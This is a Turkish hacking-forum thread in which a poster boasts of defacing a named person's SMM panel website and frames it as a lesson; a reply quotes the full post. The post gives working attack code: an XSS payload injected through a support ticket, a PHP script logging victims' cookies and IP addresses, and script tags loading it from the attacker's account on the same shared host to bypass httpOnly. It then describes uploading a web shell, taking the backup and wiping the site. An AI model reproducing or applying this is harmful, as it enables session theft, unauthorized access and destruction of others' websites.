Special #Lamer Operasyonu Devran Karaçay hacked. (2 Viewers)

Arrive 

🎗️
yenixzzza
Credits
12,882
Öğretici nitelikte bir konu. isteyenler için zone bırakıyorum.

2e9d31ff-c751-401f-b50c-6290acdebf26.jpg




Merhabalar, biliyorsunuz daha önceden bildiğiniz üzere Devran Karaçay isimli arkadaşı hackleyip konu açmıştım fakat sub domain idi. Arkadaş ise subdomain takeover'ın ne olduğunu dahi bilmeden
bana telegramdan ulaştı ve subdomain takeover Hack forum mi dedi. Üstüne üstlük ortada bir takeover mevzusu yokken. Her neyse arkadaşa yapmış olduğumuz eylemin subdomain takeover olmadığını öğrettik.
Arkadaş ise bizi sürekli "yalayarak" hacknews lamerhaber gibi yerlerdeki haberleri kaldırtmak istedi devran karaçay yazınca google a hacklendiği gözüktüğü için. 🙂 Neyse, konuyu sildim haberlere de ulaştırarak
kaldırttık. Sonra ne olsa beğenirsiniz? İnstagram üzerinden canlı yayın açıp prim kastılar, hacklenmedim, storyler atıp bunlar asılsızdır demeye, bizi de terslemeye başladı bu yaptığınız Hack forum değil diye. Ahahahah.
Güldüm de güldüm hadi gelin şimdi bakalım bu arkadaşı TEKRARDAN ANA SAYFA OLARAK nasıl hackledik ona bakalım öğretici nitelikte olsun. Hem Devran hem de yeni arkadaşlar bir şeyler kapar belki.

Öncelikle Arkadaşın sitesini biraz inceledim. SMM Panel olduğunu gördüm. (nasıl heykırsa 5 kuruşu yok habere para basmaktan.) Panele kayıt olup /admin yazdım yazdığımda ise beni tekrar kendi olduğum index.php ye attı.
Tahmin ettiğim gibi bu ElinSoft Firmasının MoonPaneli idi. Fakat arkadaşın parası çıkmamış olacakki nulled kurmuş ve XSS açığı mevcuttu. Hemen https://xss.report/ sitesine girdim ve bir payload seçip tickettan atmayı
denedim. Arkadaş düştü buna tabiki. Karşımda olan rapor tablosunda ise bütün bilgiler çekilmiş fakat ihtiyacımız olan "Cookie" kısmı boş.

Aslında biraz da tahmin ettiğim gibi oldu. Sonra hemen https://dnsdumpster.com/ sitesine girdim ve siteyi sorguladım. Merhabaİnternet isimli bir hosting firmasında barınıyor. (Sanırım arkadaş reseller almış fakat
hosting firması mal olduğu için aynı ip den veriyor paylaşımlı ile.) Siteye döndüğümde ise cPanel olduğunu ve Mod user dir açık olduğunu gördüm. Bu ise bizim asıl işimiz olan cookie'yi çekmemizi sağlayan
özellik olacak.
Neden mi? Anlatayım:
Elimizde 2 site olsun 1.com ve 2.com, httpOnly olarak işaretlenmiş cookieleri okumaya tarayıcılar müsaade etmez.
Fakat biz bu özellik sayesinde 1.com/~ftpismimiz/ yazarsak onun domaini ile kendi dosyalarımızı görüntüleyebilir ve tarayıcıların bu güvenliğini atlatmış oluruz.

Öncelikle canlı destek ile görüşüp aynı IP adresinde barınıp barınamayacağımı sordum sormama bile gerek yokmuş aslında ama sordum. evet mümkün olduğunu söylediklerinde hemen bir hosting satın aldım.
Hostingim açıldığında ise şöyle bir yol izlemeyi planladım:
Bir PHP dosyası olacak ve bu dosyayı JS kodu ile siteye XSS açığı aracılığı ile inject edeceğiz bu JS kodu ile de PHP kodumuz tetiklenecek ve istediğimiz Cookieleri almış olacağız.
Hemen PHP kodumu yazdım.

Kod:
<?php
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
}
$cookie = urlencode(json_encode($_COOKIE));
$ip  = $_SERVER['REMOTE_ADDR'];
$local_tut = fopen("log.txt", "a+");
fwrite($local_tut, "IP: $ip | Cookies: $cookie".PHP_EOL);
fclose($local_tut);
?>
Bu kod çalıştırıldığında ise kişinin IP adresi ve asıl isteğimiz cookiesi log.txt dosyasına yazdırılacak.
ve hemen tekrardan kodun çalışması için bir JS kodu yazdım.

Buyrun o kodu da inceleyelim:


Kod:
<script>
$(document).ready(function() {
    $.ajax({
        url: 'ajax.php',
        type: 'GET',
        success: function(data) {
            $('body').append(data);
        },
        error: function() {
            console.error('Veri çekilirken bir hata oluştu.');
        }
    });
});
</script>
Bu kod ise jQuery kütüphanesini kullanarak bir AJAX isteği atıyor. PHP dosyamızı (ajax.php) yi sitede <body> etiketi içerisine gömerek çalışmasını sağlayacak ve bize yardımcı olacak.
Bu kodun da çalışması için tabii ki jquery ile yollamamız gerekli.
Tekrar destek kısmına geldim ve bir soru ile kodumu bıraktım.

Kod:
Kod:
<script src="[URL]https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js[/URL]" integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://panelde.com.tr[URL='https://panelde.com.tr/~mesdfdsf/cookie.js']/~ftpismim/cookie.js[/URL]"></script>
Bu kod ile dosyamız çalışacak ve ajax php yi etkileyecek o da log.txt dosyasına cookielerimizi kaydedecek.
Çok geçmeden arkadaş düştü ve cookie'si elime ulaştı. /admin yazıp hemen tema kısmından dosyalara bir shell upload ettim, yedeği aldım. herşeyi silerek indeximi bıraktım.
Artık story atıp canlı yayın açıp hacklenmedim ben diye ağlamaya devam edersin.
"Al buda en kralından 'h*ck' dersi."
 
Son düzenleme:
Credits
3,386
Öğretici nitelikte bir konu. isteyenler için zone bırakıyorum.

Ekli dosyayı görüntüle 8259




Merhabalar, biliyorsunuz daha önceden bildiğiniz üzere Devran Karaçay isimli arkadaşı hackleyip konu açmıştım fakat sub domain idi. Arkadaş ise subdomain takeover'ın ne olduğunu dahi bilmeden
bana telegramdan ulaştı ve subdomain takeover hack mi dedi. Üstüne üstlük ortada bir takeover mevzusu yokken. Her neyse arkadaşa yapmış olduğumuz eylemin subdomain takeover olmadığını öğrettik.
Arkadaş ise bizi sürekli "yalayarak" hacknews lamerhaber gibi yerlerdeki haberleri kaldırtmak istedi devran karaçay yazınca google a hacklendiği gözüktüğü için. 🙂 Neyse, konuyu sildim haberlere de ulaştırarak
kaldırttık. Sonra ne olsa beğenirsiniz? İnstagram üzerinden canlı yayın açıp prim kastılar, hacklenmedim, storyler atıp bunlar asılsızdır demeye, bizi de terslemeye başladı bu yaptığınız hack değil diye. Ahahahah.
Güldüm de güldüm hadi gelin şimdi bakalım bu arkadaşı TEKRARDAN ANA SAYFA OLARAK nasıl hackledik ona bakalım öğretici nitelikte olsun. Hem Devran hem de yeni arkadaşlar bir şeyler kapar belki.

Öncelikle Arkadaşın sitesini biraz inceledim. SMM Panel olduğunu gördüm. (nasıl heykırsa 5 kuruşu yok habere para basmaktan.) Panele kayıt olup /admin yazdım yazdığımda ise beni tekrar kendi olduğum index.php ye attı.
Tahmin ettiğim gibi bu ElinSoft Firmasının MoonPaneli idi. Fakat arkadaşın parası çıkmamış olacakki nulled kurmuş ve XSS açığı mevcuttu. Hemen https://xss.report/ sitesine girdim ve bir payload seçip tickettan atmayı
denedim. Arkadaş düştü buna tabiki. Karşımda olan rapor tablosunda ise bütün bilgiler çekilmiş fakat ihtiyacımız olan "Cookie" kısmı boş.

Aslında biraz da tahmin ettiğim gibi oldu. Sonra hemen https://dnsdumpster.com/ sitesine girdim ve siteyi sorguladım. Merhabaİnternet isimli bir hosting firmasında barınıyor. (Sanırım arkadaş reseller almış fakat
hosting firması mal olduğu için aynı ip den veriyor paylaşımlı ile.) Siteye döndüğümde ise cPanel olduğunu ve Mod user dir açık olduğunu gördüm. Bu ise bizim asıl işimiz olan cookie'yi çekmemizi sağlayan
özellik olacak.
Neden mi? Anlatayım:
Elimizde 2 site olsun 1.com ve 2.com, httpOnly olarak işaretlenmiş cookieleri okumaya tarayıcılar müsaade etmez.
Fakat biz bu özellik sayesinde 1.com/~ftpismimiz/ yazarsak onun domaini ile kendi dosyalarımızı görüntüleyebilir ve tarayıcıların bu güvenliğini atlatmış oluruz.

Öncelikle canlı destek ile görüşüp aynı IP adresinde barınıp barınamayacağımı sordum sormama bile gerek yokmuş aslında ama sordum. evet mümkün olduğunu söylediklerinde hemen bir hosting satın aldım.
Hostingim açıldığında ise şöyle bir yol izlemeyi planladım:
Bir PHP dosyası olacak ve bu dosyayı JS kodu ile siteye XSS açığı aracılığı ile inject edeceğiz bu JS kodu ile de PHP kodumuz tetiklenecek ve istediğimiz Cookieleri almış olacağız.
Hemen PHP kodumu yazdım.

<?php if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"]; } $cookie = urlencode(json_encode($_COOKIE)); $ip = $_SERVER['REMOTE_ADDR']; $local_tut = fopen("log.txt", "a+"); fwrite($local_tut, "IP: $ip | Cookies: $cookie".PHP_EOL); fclose($local_tut); ?>
Bu kod çalıştırıldığında ise kişinin IP adresi ve asıl isteğimiz cookiesi log.txt dosyasına yazdırılacak.
ve hemen tekrardan kodun çalışması için bir JS kodu yazdım.

Buyrun o kodu da inceleyelim:


<script> $(document).ready(function() { $.ajax({ url: 'ajax.php', type: 'GET', success: function(data) { $('body').append(data); }, error: function() { console.error('Veri çekilirken bir hata oluştu.'); } }); }); </script>
Bu kod ise jQuery kütüphanesini kullanarak bir AJAX isteği atıyor. PHP dosyamızı (ajax.php) yi sitede <body> etiketi içerisine gömerek çalışmasını sağlayacak ve bize yardımcı olacak.
Bu kodun da çalışması için tabii ki jquery ile yollamamız gerekli.
Tekrar destek kısmına geldim ve bir soru ile kodumu bıraktım.

Kod:
<script src="[URL]https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js[/URL]" integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script src="https://panelde.com.tr[URL='https://panelde.com.tr/~mesdfdsf/cookie.js']/~ftpismim/cookie.js[/URL]"></script>
Bu kod ile dosyamız çalışacak ve ajax php yi etkileyecek o da log.txt dosyasına cookielerimizi kaydedecek.
Çok geçmeden arkadaş düştü ve cookie'si elime ulaştı. /admin yazıp hemen tema kısmından dosyalara bir shell upload ettim, yedeği aldım. herşeyi silerek indeximi bıraktım.
Artık story atıp canlı yayın açıp hacklenmedim ben diye ağlamaya devam edersin.
"Al buda en kralından 'hack' dersi."
Eline sağlık
 
Eline emeğine sağlık çok güzel anlatmışsın
Konunun üzücü kısmıysa Bizim halk bu kadar eşşek olduğu sürece 2 3 bilgi öğrenip sikimsonik platformlarda reklam geçen kişileri hacker olarak bilmeye devam edecekler
 

Bu konuyu görüntüleyen kullanıcılar